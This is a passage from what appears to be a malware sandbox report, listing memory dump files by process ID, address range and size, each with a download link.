                                                              • memory/3636-162-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                Filesize

                                                                72KB

                                                                Download

                                                              • memory/3724-189-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                                Download

                                                              • memory/3972-246-0x00000000002C0000-0x00000000002D2000-memory.dmp

                                                                Filesize

                                                                72KB

                                                                Download

                                                              • memory/4052-228-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                                Download

                                                              • memory/4060-138-0x00007FF6595C0000-0x00007FF6596AE000-memory.dmp

                                                                Filesize

                                                                952KB

                                                                Download

                                                              • memory/4060-135-0x00007FF6595C0000-0x00007FF6596AE000-memory.dmp

                                                                Filesize

                                                                952KB

                                                                Download

                                                              • memory/4292-220-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                                Download

                                                              • memory/4548-210-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                                Download

                                                              • memory/4880-202-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                                Download

                                                              • memory/4900-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

                                                                Filesize

                                                                6.6MB

                                                                Download

                                                              • memory/5116-193-0x00007FF7F1030000-0x00007FF7F108B000-memory.dmp

                                                                Filesize

                                                                364KB

                                                                Download